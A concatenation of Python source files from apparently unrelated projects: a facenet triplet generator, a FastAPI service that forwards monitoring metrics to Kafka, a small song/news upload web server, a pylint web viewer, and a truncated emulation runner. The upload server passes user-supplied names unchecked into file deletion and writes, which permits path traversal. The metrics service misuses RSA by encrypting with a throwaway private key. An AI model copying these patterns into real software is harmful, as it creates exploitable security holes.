for image_path in [anchor, positive, negative]
]
triplet_list.append([*image_paths, pos_class, pos_class, neg_class])
for aligned_image, image_path in zip(aligned_images, image_paths):
# NOTE: images are saved aligned but also post-processed, therefore we
# don't need to transform them on load using the method
# facenet_pytorch.fixed_image_standardization.
abs_image_path = os.path.join(path.get_project_root(), image_path)
save_path, save_name = os.path.split(abs_image_path)
os.makedirs(save_path, exist_ok=True)
normalized_image = aligned_image / 255.0
save_image(normalized_image, image_path)
# Update the total value of triplets, since some could have been discarded (i.e. not able to
# align, or other reason)
n_triplets = len(triplet_list)
temp_path = path.change_data_category(dataset.get_path(), "interim")
os.makedirs(temp_path, exist_ok=True)
np.save(
os.path.join(temp_path, f"triplets_{n_triplets}_{process_id}.npy"), triplet_list
)
return triplet_list
def triplets(dataset: Raw, n_triplets: int, n_processes: int):
"""Generate a set of triplets. It saves an aligned copy of each image in a triplet in
`data/processed` and a file `.npy` containing the list of triplets.
:param dataset: dataset to use to generate triplets
:param n_triplets: number o triplets to generate
:param n_processes: number of processes to use
"""
# NOTE: code is inspired by https://github.com/tamerthamoqa/facenet-pytorch-vggface2
triplet_list = []
print(f"Generating {n_triplets} triplets using {n_processes} processes...")
triplet_residual = n_triplets % n_processes
n_triplets_per_process = (n_triplets - triplet_residual) / n_processes
processes = []
for i in range(n_processes):
processes.append(
multiprocessing.Process(
target=_triplets, args=(dataset, n_triplets_per_process, i)
)
)
for process in processes:
process.start()
for process in processes:
process.join()
# Generate residual triplets.
_triplets(dataset, triplet_residual, n_processes + 1)
temp_path = path.change_data_category(dataset.get_path(), "interim")
numpy_files = glob(os.path.join(temp_path, "*.npy"))
for numpy_file in numpy_files:
triplet_list.extend(np.load(numpy_file))
os.remove(numpy_file)
# Update the total value of triplets, since some could have been discarded (i.e. not able to
# align, or other reason)
n_triplets = len(triplet_list)
save_path = os.path.join(path.get_project_root(), "data", "processed", "triplets")
os.makedirs(save_path, exist_ok=True)
n_files = str(len(glob(os.path.join(save_path, "*.*")))).zfill(2)
basename = f"{n_files}_{dataset.get_name()}_{n_triplets}.npy"
filename = os.path.join(save_path, basename)
print(f"Saved triplets to {filename}")
np.save(filename, triplet_list)
|
main.py | from fastapi import FastAPI, Response
from starlette.status import HTTP_204_NO_CONTENT
import uuid, random, requests, json, hashlib, os, rsa, sys, datetime, trace, time, logging
from threading import Thread
from queue import PriorityQueue
from Crypto.PublicKey import RSA
from pydantic import BaseModel
from typing import Optional, List
from kafka import KafkaProducer
from fastapi.responses import JSONResponse
from sqlalchemy import *
from sqlalchemy import create_engine
from sqlalchemy_utils import database_exists, create_database
from sqlalchemy.orm import scoped_session, sessionmaker, relationship
from sqlalchemy.ext.declarative import declarative_base
import sqlalchemy.dialects.postgresql as postgresql
import psycopg2
import psycopg2.extras
from dateutil.relativedelta import relativedelta
from timeloop import Timeloop
from datetime import timedelta
logging.basicConfig(filename='logs/'+'mda.json', level=logging.INFO, format='{ "timestamp": "%(asctime)s.%(msecs)03dZ", %(message)s}', datefmt='%Y-%m-%dT%H:%M:%S')
logging.getLogger("uvicorn.error").setLevel(logging.CRITICAL)
logging.getLogger("kafka").setLevel(logging.CRITICAL)
# Environment variables
try:
POSTGRES_USER = os.environ["POSTGRES_USER"]
POSTGRES_PW = os.environ["POSTGRES_PW"]
POSTGRES_URL = os.environ["POSTGRES_URL"]
POSTGRES_DB = os.environ["POSTGRES_DB"]
RESET_DB = os.environ["RESET_DB"]
KAFKA_HOST = os.environ["KAFKA_HOST"]
KAFKA_PORT = os.environ["KAFKA_PORT"]
#publicKeyOperator = os.environ["OPERATOR_PUBLIC_KEY"]
except Exception as e:
print("Environment variable does not exists.")
sys.exit(0)
class Metric_Model(BaseModel):
metricName: str
metricType: str
step: str
aggregationMethod: Optional[str] = None
step_aggregation: Optional[str] = None
class Response_Metric_Model(BaseModel):
metricName: str
metricType: str
step: str
aggregationMethod: Optional[str] = None
step_aggregation: Optional[str] = None
next_run_at: datetime.datetime
next_aggregation: Optional[datetime.datetime] = None
class Config_Model(BaseModel):
businessID: str
topic: str
networkID: int
tenantID: str
resourceID: str
referenceID: str
metrics: List[Metric_Model]
timestampStart: Optional[datetime.datetime] = None
timestampEnd: Optional[datetime.datetime] = None
class Update_Config_Model(BaseModel):
timestampEnd: Optional[datetime.datetime] = None
metrics: Optional[List[Metric_Model]] = None
class Response_Config_Model(BaseModel):
id: uuid.UUID
created_at: datetime.datetime
updated_at: datetime.datetime
businessID: str
topic: str
networkID: int
timestampStart: datetime.datetime
timestampEnd: Optional[datetime.datetime] = None
metrics: List[Response_Metric_Model]
status: int
tenantID: str
resourceID: str
referenceID: str
class Response_Error_Model(BaseModel):
status: str
message: str
# Json response example
json_response_enable = {"id": "ab51f3e1-7b61-4f9d-85a4-9e9f366b593b","created_at": "2021-03-11T11:34:00.402075","updated_at": "null","businessID": 36574564,"businessID": "business1", "topic": "test1", "networkID": 1, "tenantID": "tenant1", "referenceID": "reference1", "resourceID": "resource1","timestampStart": "2021-03-11T11:35:00","timestampEnd": "null","metrics": [{"metricName": "cpu_utilization","metricType": "float","aggregationMethod": "sum","step": "15min","step_aggregation": "1h", "next_run_at": "2021-03-11T11:45:00", "next_aggregation": "2021-03-11T12:35:00"}],"status": 1}
json_response_disable = json_response_enable.copy()
json_response_disable['status'] = 0
agg_options = ['SUM', 'AVG', 'MIN', 'MAX', 'COUNT', 'STDDEV']
step_options = ['s', 'm', 'h', 'd', 'w']
wait_queue = PriorityQueue()
metrics_queue = PriorityQueue()
num_fetch_threads = 20
first_metric_aux = None
update_queue_flag = False
from .database import *
def info_log(status, message):
logging.critical('"status": "'+str(status)+'", "message": "'+message+'"')
# Update first metric to read
def update_first_metric_aux():
global wait_queue
if wait_queue.empty():
return None
aux = wait_queue.get()
wait_queue.put(aux)
return aux[0]
def send_kafka(data, dataHash, kafka_topic):
try:
payload_encoded = {k: str(v).encode('utf-8') for k, v in dataHash.items()}
hashData = {k: hashlib.sha256(v).hexdigest() for k,v in payload_encoded.items()}
#info_log(None, f'Raw Data: {data} \nHashed Data: {hashData}')
public_key, private_key = rsa.newkeys(1024)
dataHashEncrypt = {rsa.encrypt(k.encode(), private_key): rsa.encrypt(v.encode(), private_key) for k,v in hashData.items()}
#info_log(None, f'Signup Data: {dataHashEncrypt}')
producer = KafkaProducer(bootstrap_servers=[KAFKA_HOST+':'+KAFKA_PORT], value_serializer=lambda x: json.dumps(x).encode('utf-8'), api_version=(0,10,1))
producer.send(kafka_topic, key=list(dataHashEncrypt.values())[0], value=data)
info_log(200, f'Post metric {data["monitoringData"]["metricName"]}, from operator {data["operatorID"]}, into DL Kafka Topic {kafka_topic} [Post Time: {data["monitoringData"]["timestamp"]}]')
return 1
except Exception as e:
info_log(400, 'Erro in request_orchestrator: ' + str(e))
return 0
def send_aggregation(metric_name, resourceID, referenceID, next_run_at, tenantID, businessID, networkID, kafka_topic, aggregation, metric_id, next_aggregation, step_aggregation):
try:
value = get_last_aggregation(metric_id, aggregation, next_aggregation, step_aggregation)
# Create JSON object that will be sent to DL Kafka Topic
monitoringData = {
"metricName" : metric_name,
"metricValue" : value,
"resourceID" : resourceID,
"referenceID" : referenceID,
"timestamp" : str(next_run_at),
"aggregationMethod": aggregation
}
dataHash = {
"data" : monitoringData
}
data = {
"operatorID" : tenantID,
"businessID" : businessID,
"networkID" : networkID
}
data["monitoringData"] = monitoringData
send_kafka(data, dataHash, kafka_topic)
print('SEND AGGREGATION-> '+str(next_run_at)+' -> '+ str(value))
return 1
except Exception as e:
print('send_aggregation-> ' + str(e))
info_log(400, 'Erro in request_orchestrator: ' + str(e))
return 0
def request_orchestrator(metric_name, resourceID, referenceID, next_run_at, tenantID, businessID, networkID, kafka_topic, aggregation, metric_id):
try:
request_metric = "match="+metric_name+"&"
request_schedule = "start="+str(next_run_at)
# curl TBD to 'http://localhost:9090/api/v1/query=cpu_utilization&time=2015-07-01T20:10:51'
endpoint = 'http://osm:4500/monitoringData?'
request_url = endpoint + request_metric + request_schedule
response = requests.get(request_url)
if response.status_code != 200:
info_log(400, "Request to OSM not sucessful")
#print(f'Error: Request to OSM not successful')
return('Error in fetching data!', 200)
resp = response.text
json_data = json.loads(resp)
info_log(None, f'Response from OSM: {resp}')
if aggregation != None:
#Save value in db
insert_metric_value(metric_id, json_data["data"]["result"][0]["values"][0][1], next_run_at)
else:
# Create JSON object that will be sent to DL Kafka Topic
monitoringData = {
"metricName" : json_data["data"]["result"][0]["metric"]["__name__"],
"metricValue" : json_data["data"]["result"][0]["values"][0][1],
"resourceID" : resourceID,
"referenceID" : referenceID,
"timestamp" : str(next_run_at)
}
dataHash = {
"data" : monitoringData
}
data = {
"operatorID" : tenantID,
"businessID" : businessID,
"networkID" : networkID
}
data["monitoringData"] = monitoringData
send_kafka(data, dataHash, kafka_topic)
print('SEND DATA-> '+str(next_run_at)+' -> '+ str(json_data["data"]["result"][0]["values"][0][1]))
return 1
except Exception as e:
print('request_orchestrator-> ' + str(e))
info_log(400, 'Erro in request_orchestrator: ' + str(e))
return 0
# Worker thread function
def queue_consumer(i, q):
global update_queue_flag
try:
while True:
next_item = q.get()
info_log(None, f'Start Fetching Values of Metric: {next_item[5]} (Thread Associated: {i})')
if next_item[16] == 1:
#Send aggregation
info_log(None, f'{datetime.datetime.now()} - UC1: Aggregating values from metric: {next_item[5]} (Step Aggregation Associated: {next_item[14]})')
send_aggregation(next_item[5], next_item[12], next_item[13], next_item[0], next_item[11], next_item[8], next_item[10], next_item[9], next_item[7], next_item[4], next_item[15], next_item[14])
else:
#Send metric
request_orchestrator(next_item[5], next_item[12], next_item[13], next_item[0], next_item[11], next_item[8], next_item[10], next_item[9], next_item[7], next_item[4])
info_log(None, f'{datetime.datetime.now()} - UC2: Fetching values from OSM, metric: {next_item[5]} (Step Associated: {next_item[2]}')
update_next_run(next_item[4])
update_queue_flag = True
q.task_done()
except Exception as e:
print(e)
def validate_uuid4(uuid_string):
try:
uuid.UUID(uuid_string).hex
except ValueError:
return False
return True
# --------------------- START SCRIPT -----------------------------#
# ----------------------------------------------------------------#
# Load database metrics to wait queue
load_database_metrics()
# Update first metric to read
first_metric_aux = update_first_metric_aux()
# Set up threads to fetch the metrics
for i in range(num_fetch_threads):
worker = Thread(target=queue_consumer, args=(i, metrics_queue,))
worker.setDaemon(True)
worker.start()
# Check waiting metrics
tl = Timeloop()
logging.getLogger("timeloop").setLevel(logging.CRITICAL)
@tl.job(interval=timedelta(seconds=1))
def check_waiting_metrics():
global metrics_queue
global wait_queue
global update_queue_flag
global first_metric_aux
'''print('RUN TIMELOOP')
print('metrics_queue')
print(metrics_queue.queue)
print('wait_queue')
print(wait_queue.queue)
print('update_queue_flag')
print(update_queue_flag)
print('first_metric_aux')
print(first_metric_aux)
print('now')
print(str(datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")))'''
if update_queue_flag:
first_metric_aux = update_first_metric_aux()
update_queue_flag = False
if first_metric_aux != None and str(first_metric_aux) <= str(datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")):
metrics_queue.put(wait_queue.get())
first_metric_aux = update_first_metric_aux()
return
tl.start(block=False)
# ----------------------- MAIN APP -------------------------------#
# ----------------------------------------------------------------#
app = FastAPI()
@app.on_event("shutdown")
def shutdown_event():
print('exit')
global metrics_queue
global wait_queue
wait_queue.join()
metrics_queue.join()
#Close connection db
close_connection()
return
# ----------------- REST FASTAPI METHODS -------------------------#
# ----------------------------------------------------------------#
@app.post("/settings", status_code=201, responses={201: {"model": Response_Config_Model,
"content": {"application/json": {
"example": json_response_enable}}},
404: {"model": Response_Error_Model,
"content": {"application/json": {
"example": {"status": "Error", "message": "Error message."}}}}})
async def set_param(config: Config_Model):
global update_queue_flag
for metric in config.metrics:
if metric.aggregationMethod != None and metric.aggregationMethod.upper() not in agg_options:
return JSONResponse(status_code=404, content={"status": "Error", "message": "Aggregation step options is "+str(agg_options)+"."})
if metric.step_aggregation != None and metric.step_aggregation[-1] not in step_options and metric.step[-1] not in step_options:
return JSONResponse(status_code=404, content={"status": "Error", "message": "Step and step aggregation options is "+str(step_options)+"."})
if config.timestampStart == None:
config.timestampStart = datetime.datetime.now()
elif config.timestampStart < datetime.datetime.now() - relativedelta(minutes=1):
return JSONResponse(status_code=404, content={"status": "Error", "message": "Timestamp start need to be after current now."})
if config.timestampEnd != None and config.timestampStart > config.timestampEnd:
return JSONResponse(status_code=404, content={"status": "Error", "message": "Timestamp start need to be after timestamp end."})
# Save config in database
resp = add_config(config)
if resp == -1:
return JSONResponse(status_code=404, content={"status": "Error", "message": "Error in create config in database."})
update_queue_flag = True
info_log(200, f'Monitoring spec successfully created by operator {config.tenantID}')
return resp
@app.get("/settings/{config_id}", responses={200: {"model": Response_Config_Model,
"content": {"application/json": {
"example": json_response_enable}}},
404: {"model": Response_Error_Model,
"content": {"application/json": {
"example": {"status": "Error", "message": "Error message."}}}}})
async def get_config_id(config_id):
# Get config by id
if validate_uuid4(config_id) is False:
return JSONResponse(status_code=404, content={"status": "Error", "message": "Config id invalid."})
resp = get_config(config_id)
if resp == 0:
return JSONResponse(status_code=404, content={"status": "Error", "message": "Config id invalid."})
if resp == -1:
return JSONResponse(status_code=404, content={"status": "Error", "message": "Error in get config in database."})
return resp
@app.get("/settings", responses={200: {"model": List[Response_Config_Model],
"content": {"application/json": {
"example": [json_response_enable]}}},
404: {"model": Response_Error_Model,
"content": {"application/json": {
"example": {"status": "Error", "message": "Error message."}}}}})
async def get_all_configs():
# Get configs
resp = get_configs()
if resp == -1:
return JSONResponse(status_code=404, content={"status": "Error", "message": "Error in get config in database."})
return resp
@app.put("/settings/{config_id}", responses={200: {"model": Response_Config_Model,
"content": {"application/json": {
"example": json_response_enable}}},
404: {"model": Response_Error_Model,
"content": {"application/json": {
"example": {"status": "Error", "message": "Error message."}}}}})
async def update_config_id(config_id, config: Update_Config_Model):
global update_queue_flag
# Update config by id
if validate_uuid4(config_id) is False:
return JSONResponse(status_code=404, content={"status": "Error", "message": "Config id invalid."})
resp = update_config(config_id, config)
if resp == 0:
return JSONResponse(status_code=404, content={"status": "Error", "message": "Config id invalid."})
if resp == 1:
return JSONResponse(status_code=404, content={"status": "Error", "message": "Arguments invalid."})
if resp == 2:
return JSONResponse(status_code=404, content={"status": "Error", "message": "Timestamp end must be superior to the actual."})
if resp == -1:
return JSONResponse(status_code=404, content={"status": "Error", "message": "Error in update config in database."})
update_queue_flag = True
info_log(200, f'Monitoring spec {config_id} successfully updated')
return resp
@app.put("/settings/{config_id}/enable", responses={200: {"model": Response_Config_Model,
"content": {"application/json": {
"example": json_response_enable}}},
404: {"model": Response_Error_Model,
"content": {"application/json": {
"example": {"status": "Error", "message": "Error message."}}}}})
async def enable_config_id(config_id):
global update_queue_flag
# Enable config by id
if validate_uuid4(config_id) is False:
return JSONResponse(status_code=404, content={"status": "Error", "message": "Config id invalid."})
resp = enable_config(config_id)
if resp == 0:
return JSONResponse(status_code=404, content={"status": "Error", "message": "Config id invalid."})
if resp == 1:
return JSONResponse(status_code=404, content={"status": "Error", "message": "Config already enabled."})
if resp == -1:
return JSONResponse(status_code=404, content={"status": "Error", "message": "Error in enable config in database."})
update_queue_flag = True
info_log(200, f'Monitoring spec {config_id} successfully enabled')
return resp
@app.put("/settings/{config_id}/disable", responses={200: {"model": Response_Config_Model,
"content": {"application/json": {
"example": json_response_disable}}},
404: {"model": Response_Error_Model,
"content": {"application/json": {
"example": {"status": "Error", "message": "Error message."}}}}})
async def disable_config_id(config_id):
global update_queue_flag
# Disable config by id
if validate_uuid4(config_id) is False:
return JSONResponse(status_code=404, content={"status": "Error", "message": "Config id invalid."})
resp = disable_config(config_id)
if resp == 0:
return JSONResponse(status_code=404, content={"status": "Error", "message": "Config id invalid."})
if resp == 1:
return JSONResponse(status_code=404, content={"status": "Error", "message": "Config already disabled."})
if resp == -1:
return JSONResponse(status_code=404, content={"status": "Error", "message": "Error in disable config in database."})
update_queue_flag = True
info_log(200, f'Monitoring spec {config_id} successfully disabled')
return resp
@app.delete("/settings/{config_id}", status_code=HTTP_204_NO_CONTENT, responses={404: {"model": Response_Error_Model,
"content": {"application/json": {
"example": {"status": "Error", "message": "Error message."}}}}})
async def delete_config_id(config_id):
global update_queue_flag
# Get config by id
if validate_uuid4(config_id) is False:
return JSONResponse(status_code=404, content={"status": "Error", "message": "Config id invalid."})
resp = delete_config(config_id)
if resp == 0:
return JSONResponse(status_code=404, content={"status": "Error", "message": "Config id invalid."})
if resp == -1:
return JSONResponse(status_code=404, content={"status": "Error", "message": "Error in delete config in database."})
update_queue_flag = True
info_log(200, f'Monitoring spec {config_id} successfully deleted')
return Response(status_code=HTTP_204_NO_CONTENT)
|
hserv.py | from http.server import BaseHTTPRequestHandler, HTTPServer
from threading import Thread
import time
import cgi
import os
import sys
import subprocess
if len(sys.argv) != 2:
print("python3 hserv.py password")
sys.exit(0)
class WebServer(BaseHTTPRequestHandler):
def do_GET(self):
if self.path == "/":
self.html_out("startseite.html")
elif self.path == "/background":
self.jpeg_out("musik.jpg")
def do_POST(self):
if self.path == "/start":
form = cgi.FieldStorage(fp=self.rfile, headers=self.headers, environ={"REQUEST_METHOD": "POST", "CONTENT_TYPE": self.headers["Content-Type"]})
if form["pass"].value == sys.argv[1]:
self.html_out_dir("files.html")
else:
self.html_out("startseite.html")
elif self.path == "/deletesong":
form = cgi.FieldStorage(fp=self.rfile, headers=self.headers, environ={"REQUEST_METHOD": "POST", "CONTENT_TYPE": self.headers["Content-Type"]})
if form["pass"].value == sys.argv[1]:
os.remove("songs/" + form["delete"].value)
self.html_out_dir("files.html")
else:
self.html_out("startseite.html")
elif self.path == "/deletenews":
form = cgi.FieldStorage(fp=self.rfile, headers=self.headers, environ={"REQUEST_METHOD": "POST", "CONTENT_TYPE": self.headers["Content-Type"]})
if form["pass"].value == sys.argv[1]:
os.remove("news/" + form["delete"].value)
self.html_out_dir("files.html")
else:
self.html_out("startseite.html")
elif self.path == "/upsong":
form = cgi.FieldStorage(fp=self.rfile, headers=self.headers, environ={"REQUEST_METHOD": "POST", "CONTENT_TYPE": self.headers["Content-Type"]})
if form["pass"].value == sys.argv[1]:
f = open(form["file"].filename, "wb")
f.write(form["file"].file.read())
f.close()
subprocess.Popen(["/usr/bin/python3", "convert.py", form["file"].filename, "songs/" + form["title"].value]).wait()
os.remove(form["file"].filename)
self.html_out_dir("files.html")
else:
self.html_out("startseite.html")
elif self.path == "/upnews":
form = cgi.FieldStorage(fp=self.rfile, headers=self.headers, environ={"REQUEST_METHOD": "POST", "CONTENT_TYPE": self.headers["Content-Type"]})
if form["pass"].value == sys.argv[1]:
f = open(form["file"].filename, "wb")
f.write(form["file"].file.read())
f.close()
subprocess.Popen(["/usr/bin/python3", "convert.py", form["file"].filename, "news/" + form["title"].value]).wait()
os.remove(form["file"].filename)
self.html_out_dir("files.html")
else:
self.html_out("startseite.html")
def jpeg_out(self, filename):
self.send_response(200)
self.send_header("Content-type", "image/jpeg")
self.end_headers()
f = open(filename, "rb")
out = f.read()
f.close()
self.wfile.write(out)
def html_out(self, filename):
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
ltime = time.localtime()
nowtime = ("%2.2d" % ltime[3]) + ":" + ("%2.2d" % ltime[4])
f = open(filename)
out = f.read()
f.close()
out = out.replace("<TIME>", nowtime)
self.wfile.write(out.encode())
def html_out_dir(self, filename):
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
ltime = time.localtime()
nowtime = ("%2.2d" % ltime[3]) + ":" + ("%2.2d" % ltime[4])
lshtml = "<div class=\"lscroller\"><form class=\"afile\" method=\"POST\" action=\"/upsong\" enctype=\"multipart/form-data\"> Titel: <input type=\"text\" name=\"title\" class=\"passwd\"> <input type=\"file\" name=\"file\" accept=\"audio/*\"> Passwort: <input type=\"password\" name=\"pass\" class=\"passwd\"> <input type=\"submit\" value=\"hochladen\"></form><br><br>"
for fn in os.listdir("songs/"):
lshtml += "<form class=\"afile\" method=\"POST\" action=\"/deletesong\">" + fn + "<input type=\"hidden\" name=\"delete\" value=\"" + fn + "\"> <input type=\"password\" name=\"pass\" class=\"passwd\"> <input type=\"submit\" value=\"delete\"></form><br>"
lshtml += "<br></div><div class=\"rscroller\"><form class=\"anews\" method=\"POST\" action=\"/upnews\" enctype=\"multipart/form-data\"> Titel: <input type=\"text\" name=\"title\" class=\"passwd\"> <input type=\"file\" name=\"file\" accept=\"audio/*\"> Passwort: <input type=\"password\" name=\"pass\" class=\"passwd\"> <input type=\"submit\" value=\"hochladen\"></form><br><br>"
for fn in os.listdir("news/"):
lshtml += "<form class=\"anews\" method=\"POST\" action=\"/deletenews\">" + fn + "<input type=\"hidden\" name=\"delete\" value=\"" + fn + "\"> <input type=\"password\" name=\"pass\" class=\"passwd\"> <input type=\"submit\" value=\"delete\"></form><br>"
lshtml += "<br></div>"
f = open(filename)
out = f.read()
f.close()
out = out.replace("<TIME>", nowtime)
out = out.replace("<FILES>", lshtml)
self.wfile.write(out.encode())
def log_message(self, format, *args):
return
def webserverloop():
hsrv = HTTPServer(('0.0.0.0', 8100), WebServer)
hsrv.serve_forever()
Thread(target=webserverloop).start()
|
lint_check.py | from __future__ import print_function
import subprocess
import xml.dom
import xml.dom.minidom
import re
import os
import os.path
from optparse import OptionParser
from collections import namedtuple
from . import monitor
from . import webserver
import json
try:
import urlparse
except ModuleNotFoundError:
from urllib import parse as urlparse
import threading
ReportMessageLine = namedtuple('ReportMessageLine', 'filename lineno state message_id method_id message_string')
ReportOnAFile = namedtuple('ReportOnAFile', 'filename state_to_number_of_messages')
class PylintReport(object):
def __init__(self, messages):
self.messages = messages
def filenames(self):
result = set([])
for message in self.messages:
result.add(message.filename)
return sorted(result)
def filereports(self):
filename_to_report = {}
for message in self.messages:
report = filename_to_report.setdefault(
message.filename,
ReportOnAFile(
message.filename,
self.new_state_to_number_of_messages_dict()
)
)
report.state_to_number_of_messages[message.state] += 1
return sorted(filename_to_report.values(), key=lambda x : x.filename)
def get_messages_of_file(self, filename):
result = []
for message in self.messages:
if message.filename == filename:
result.append(message)
return result
def to_dict(self):
result = {}
result['filereports'] = [x._asdict() for x in self.filereports()]
return result
def new_state_to_number_of_messages_dict(self):
return {'C':0, 'W':0, 'F':0, 'R':0, 'E':0}
class InterfaceToPyLint(object):
NAME_OF_THE_COMMAND = 'pylint'
def is_available(self):
process = subprocess.Popen(
['which', self.NAME_OF_THE_COMMAND],
stdout = subprocess.PIPE,
stderr = subprocess.PIPE,
)
process.communicate()
return process.returncode == 0
def run_onfile(self, path, extra_python_paths):
environment = self.get_environment_with_pythonpath(extra_python_paths)
process = subprocess.Popen(
[self.NAME_OF_THE_COMMAND, '-f', 'parseable', '-i', 'y', path],
stdout = subprocess.PIPE,
stderr = subprocess.PIPE,
env = environment
)
stdout_string, stderr_string = process.communicate()
return self.parse_report(stdout_string)
def parse_report(self, string):
messages = []
lines = string.splitlines()
regexp = re.compile("(.+?)\:(\d+)\: \[(.)(\d\d\d\d)(?:, (.+?))?\] (.*)")
number_of_statements_re = re.compile("(\d+) statements analysed.")
for line in lines:
match = regexp.match(line)
if not match is None:
messages.append(ReportMessageLine(*match.groups()))
match = number_of_statements_re.match(line)
if not match is None:
print(match.groups())
print(match.group(1))
number_of_statements = int(match.group(1))
return PylintReport(messages)
def get_environment_with_pythonpath(self, extra_python_paths):
environment = os.environ.copy()
new_pythonpath = ':'.join(extra_python_paths)
if 'PYTHONPATH' in environment:
new_pythonpath = environment['PYTHONPATH'] + ':' + new_pythonpath
environment['PYTHONPATH'] = new_pythonpath
return environment
CSS_STRING = """
.numbers {background-color: #eee;}
.lines {background-color: #ffffe0 ;}
.state {background-color: #eee; width: 1.5em; text-align: center;}
.state a {padding-left: 0.5em; padding-right: 0.5em; text-decoration: none;}
.set-C {background-color: lightblue;}
.unset-C {}
.set-R {background-color: #666;}
.unset-R {}
.set-W {background-color: yellow;}
.unset-W {}
.set-E {background-color: red;}
.unset-E {}
.set-F {background-color: orange;}
.unset-F {}
.state a:visited, a {
color: black;
}
.state a:hover {
color: #CD5C5C;
}
"""
class MakeHTMLDomFromFile(object):
def __init__(self, path, messages):
self.path = path
self.filecontents = self.get_filecontents()
self.messages = messages
self.number_of_lines_in_the_file = self.get_number_of_lines_in_the_file()
def get_filecontents(self):
with open(self.path, "r") as file:
return file.read()
def get_number_of_lines_in_the_file(self):
lines = self.filecontents.splitlines()
return len(lines)
def start(self):
self.document = self.new_document()
self.head = self.document.createElement("head")
script = self.document.createElement("script")
script.setAttribute("type","text/javascript")
script.setAttribute("src", "http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.js")
self.head.appendChild(script)
self.document.documentElement.appendChild(self.head)
self.body = self.document.createElement("body")
self.document.documentElement.appendChild(self.body)
table = self.new_table(1,7)
tr = table.firstChild
td1 = tr.firstChild
td2 = tr.lastChild
td1.setAttribute("class", "numbers")
td2.setAttribute("class", "lines")
for i in range(1,6):
tr.childNodes[i].setAttribute("class", "state")
state_characters = ('C', 'R', 'W', 'E', 'F')
for i, state_character in enumerate(state_characters):
self.add_state_line(state_character, tr.childNodes[i+1])
counts = [str(x+1) for x in range(self.number_of_lines_in_the_file)]
pre = self.document.createElement("pre")
pre.appendChild(self.document.createTextNode('\n'.join(counts)))
td1.appendChild(pre)
pre = self.document.createElement("pre")
file_data = self.document.createCDATASection(self.filecontents)
pre.appendChild(file_data)
self.document.documentElement.setAttribute("xmlns",xml.dom.XHTML_NAMESPACE)
td2.appendChild(pre)
self.body.appendChild(table)
self.add_stylesheet()
self.result = self.document.toxml()
self.document.unlink()
def add_state_line(self, state_character, td):
line_number_to_messages = {}
for message in self.messages:
if message[2] == state_character:
line_number = int(message[1])
message_strings = line_number_to_messages.setdefault(line_number, [])
message_strings.append(message[5])
line_number_to_messages[line_number] = message_strings
pre = self.document.createElement("pre")
for line_number in range(1, self.number_of_lines_in_the_file+1):
span = self.document.createElement("a")
span.appendChild(self.document.createTextNode(state_character))
pre.appendChild(span)
pre.appendChild(self.document.createTextNode('\n'))
filename = os.path.join(os.getcwd(), self.path)
span.setAttribute("href","#");
span.setAttribute("onclick","javascript:$.getJSON('/open_file', {'path':'"+filename+"', 'lineno':"+str(line_number)+"}, function handle_result(data){}); false");
if line_number in line_number_to_messages:
span.setAttribute("class", "set-"+state_character)
span.setAttribute("title", str(line_number_to_messages[line_number]))
else:
span.setAttribute("class", "unset-"+state_character)
td.appendChild(pre)
def new_table(self, number_of_rows, number_of_columns):
table = self.document.createElement("table")
for row in range(number_of_rows):
tr = self.document.createElement("tr")
table.appendChild(tr)
for column in range(number_of_columns):
td = self.document.createElement("td")
tr.appendChild(td)
return table
def new_document(self):
implementation = xml.dom.minidom.getDOMImplementation()
return implementation.createDocument(xml.dom.XHTML_NAMESPACE, "xhtml", None)
def add_stylesheet(self):
self.style = self.document.createElement("style")
self.style.setAttribute("type", "text/css")
self.head.appendChild(self.style)
stylesheet_string = CSS_STRING
stylesheet_cdata = self.document.createCDATASection(stylesheet_string)
self.style.appendChild(stylesheet_cdata)
class HandleRequest(webserver.HandleRequest):
def index_file(self):
base = os.path.split(__file__)[0]
filename = os.path.join(base, "lint_check.html")
with open(filename, "r") as file:
contents = file.read()
return contents, 'text/html'
def do_start(self):
self.server.start_lint()
return 'null', 'text/javascript'
def do_show_file(self):
parameters = urlparse.parse_qs(self.parsed_path.query)
filename = parameters['path'][0]
messages = self.server.last_report.get_messages_of_file(filename)
x = MakeHTMLDomFromFile(filename, messages)
x.start()
return x.result, 'application/xhtml+xml'
def do_get_last_report(self):
string = json.dumps(self.server.get_last_report_as_dict())
content_type = 'text/javascript'
return string, content_type
class LintWebServer(webserver.WebServer):
def __init__(self, port):
webserver.WebServer.__init__(self, port, HandleRequest)
self.run_lint()
def start_lint(self):
thread = threading.Thread(target=self.run_lint)
thread.start()
def run_lint(self):
print("running lint")
self.set_last_report(InterfaceToPyLint().run_onfile(
'src/amuse',
[os.path.join(os.getcwd(), 'src/amuse/support')]))
print("done...")
def get_last_report_as_dict(self):
return self.last_report.to_dict()
def set_last_report(self, report):
self.last_report = report
self.events_queue.put('done')
def Run():
#monitor_directories = monitor.MonitorDirectories(['src', 'support', 'test'])
#monitor_directories.check()
#monitor_directories.walk(lambda x : a.append(x))
pylint = InterfaceToPyLint()
if not pylint.is_available():
print("Error, pylint is not available.")
print("please install pylint first, this can be done with 'easy_install pylint'")
sys.exit(1)
parser = OptionParser()
parser.add_option("-p", "--port",
dest="serverport",
help="start serving on PORT",
metavar="PORT",
default=9071,
type="int")
parser.add_option("-e", "--editor",
dest="editor",
help="preferred EDITOR for editing the files",
metavar="EDITOR",
default="geany",
type="string")
(options, args) = parser.parse_args()
print("starting server on port: ", options.serverport)
webserver.EDITOR = options.editor
server = LintWebServer(options.serverport)
server.start()
if __name__ == '__main__':
Run()
#print(InterfaceToPyLint().run_onfile('src/amuse/support/data', [os.path.join(os.getcwd(), 'src')]).to_dict())
|
armrunner.py | """
Terminal Runner class
"""
__author__ = "Bruno Chianca Ferreira"
__license__ = "MIT"
__version__ = "0.5"
__maintainer__ = "Bruno Chianca Ferreira"
__email__ = "brunobcf@gmail.com"
import traceback, os, logging, time, subprocess, threading
from classes.runner.runner import Runner
from core.nodes.base import CoreNode
from classes.mobility import mobility
class ARMRunner(Runner):
def __init__(self, emulation):
self.setup(emulation)
self.nodes_digest = {}
self.iosocket_semaphore = False
def setup(self, emulation):
self.topology = emulation['arm']['topology']
self.number_of_nodes = emulation['arm']['number_of_nodes']
self.core = True if emulation['arm']['core'] == "True" else False
self.disks = True if emulation['arm']['disks'] == "True" else False
self.dump = True if emulation['arm']['dump'] == "True" else False
